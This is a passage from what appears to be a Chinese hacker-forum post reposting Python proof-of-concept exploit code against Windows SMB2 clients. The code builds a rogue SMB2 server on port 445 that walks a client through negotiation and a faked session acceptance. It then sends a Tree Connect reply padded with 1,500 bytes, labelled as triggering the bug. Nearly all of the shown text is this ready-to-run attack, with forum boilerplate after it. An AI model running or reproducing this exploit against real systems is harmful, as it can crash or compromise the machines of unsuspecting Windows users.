  304.                 self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))

  306. class SMB2SessionAcceptData(Packet):
  307.         fields = OrderedDict([
  308.                 ("Len",                       "\x09\x00"),
  309.                 ("SessionFlag",               "\x01\x00"),
  310.                 ("SecBlobOffSet",             "\x48\x00"),
  311.                 ("SecBlobLen",                "\x1d\x00"),
  312.                 ("SecBlobTag0",               "\xa1"),
  313.                 ("SecBlobTag0Len",            "\x1b"),
  314.                 ("NegTokenResp",              "\x30"),
  315.                 ("NegTokenRespLen",           "\x19"),
  316.                 ("NegTokenRespTag0",          "\xa0"),
  317.                 ("NegTokenRespTag0Len",       "\x03"),
  318.                 ("NegStateResp",              "\x0a"),
  319.                 ("NegTokenRespLen1",           "\x01"),
  320.                 ("NegTokenRespStr",           "\x00"),
  321.                 ("SecBlobTag3",               "\xa3"),
  322.                 ("SecBlobTag3Len",            "\x12"),
  323.                 ("SecBlobOctetHeader",        "\x04"),
  324.                 ("SecBlobOctetLen",           "\x10"),
  325.                 ("MechlistMICVersion",        ""),# No verification on the client side...
  326.                 ("MechlistCheckSum",          ""),
  327.                 ("MechlistSeqNumber",         ""),
  328.                 ("Data",                      ""),
  329.     ])
  330.         def calculate(self):

  332.                 ###### SecBlobLen Calc:
  333.                 CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

  335.                 CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

  337.                 MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

  339.                 #Packet Struct len
  340.                 self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob))
  341.                 self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN))
  342.                 self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2)
  343.                 self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen))
  344.                 self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2)

  346. class SMB2TreeData(Packet):
  347.     fields = OrderedDict([
  348.                 ("Len",                   "\x10\x00"),
  349.                 ("ShareType",             "\x02\x00"),
  350.                 ("ShareFlags",            "\x30\x00\x00\x00"),
  351.                 ("ShareCapabilities",     "\x00\x00\x00\x00"),
  352.                 ("AccessMask",            "\xff\x01\x1f\x01"),   
  353.                 ("Data",                  ""),         
  354.     ])

  356. ##########################################################################
  357. class SMB2(SocketServer.BaseRequestHandler):
  358.      
  359.     def handle(self):
  360.         try:
  361.               self.request.settimeout(1)
  362.               print "From:", self.client_address
  363.               data = self.request.recv(1024)

  365.              ##Negotiate proto answer.
  366.               if data[8:10] == "\x72\x00" and data[4:5] == "\xff":
  367.                 head = SMBv2Header(CreditCharge="\x00\x00",Credits="\x01\x00",PID="\x00\x00\x00\x00")
  368.                 t = SMB2NegoAns()
  369.                 t.calculate()
  370.                 packet1 = str(head)+str(t)
  371.                 buffer1 = longueur(packet1)+packet1  
  372.                 print "[*]Negotiating SMBv2."
  373.                 self.request.send(buffer1)
  374.                 data = self.request.recv(1024)

  376.               if data[16:18] == "\x00\x00":
  377.                 CreditsRequested = data[18:20]
  378.                 if CreditsRequested == "\x00\x00":
  379.                    CreditsRequested =  "\x01\x00"
  380.                 CreditCharged = data[10:12]
  381.                 head = SMBv2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
  382.                 t = SMB2NegoAns(Dialect="\x02\x02")
  383.                 t.calculate()
  384.                 packet1 = str(head)+str(t)
  385.                 buffer1 = longueur(packet1)+packet1  
  386.                 print "[*]Negotiate Protocol SMBv2 packet sent."
  387.                 self.request.send(buffer1)
  388.                 data = self.request.recv(1024)

  390.               #Session More Work to Do
  391.               if data[16:18] == "\x01\x00":
  392.                 head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",NTStatus="\x16\x00\x00\xc0")
  393.                 t = SMB2Session1Data()
  394.                 t.calculate()
  395.                 packet1 = str(head)+str(t)
  396.                 buffer1 = longueur(packet1)+packet1
  397.                 print "[*]Session challenge SMBv2 packet sent."
  398.                 self.request.send(buffer1)
  399.                 data = self.request.recv(1024)

  401.               #Session Positive
  402.               if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02":
  403.                 head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
  404.                 t = SMB2SessionAcceptData()
  405.                 t.calculate()
  406.                 packet1 = str(head)+str(t)
  407.                 buffer1 = longueur(packet1)+packet1
  408.                 self.request.send(buffer1)
  409.                 data = self.request.recv(1024)

  411.               ## Tree Connect
  412.               if data[16:18] == "\x03\x00":
  413.                 head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
  414.                 t = SMB2TreeData(Data="C"*1500)#//BUG
  415.                 packet1 = str(head)+str(t)
  416.                 buffer1 = longueur(packet1)+packet1
  417.                 print "[*]Triggering Bug; Tree Connect SMBv2 packet sent."
  418.                 self.request.send(buffer1)
  419.                 data = self.request.recv(1024)

  421.         except Exception:
  422.            print "Disconnected from", self.client_address
  423.            pass

  425. SocketServer.TCPServer.allow_reuse_address = 1
  426. launch = SocketServer.TCPServer(('', 445),SMB2)
  427. launch.serve_forever()
复制代码


Microsoft, Windows

相关帖子

过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表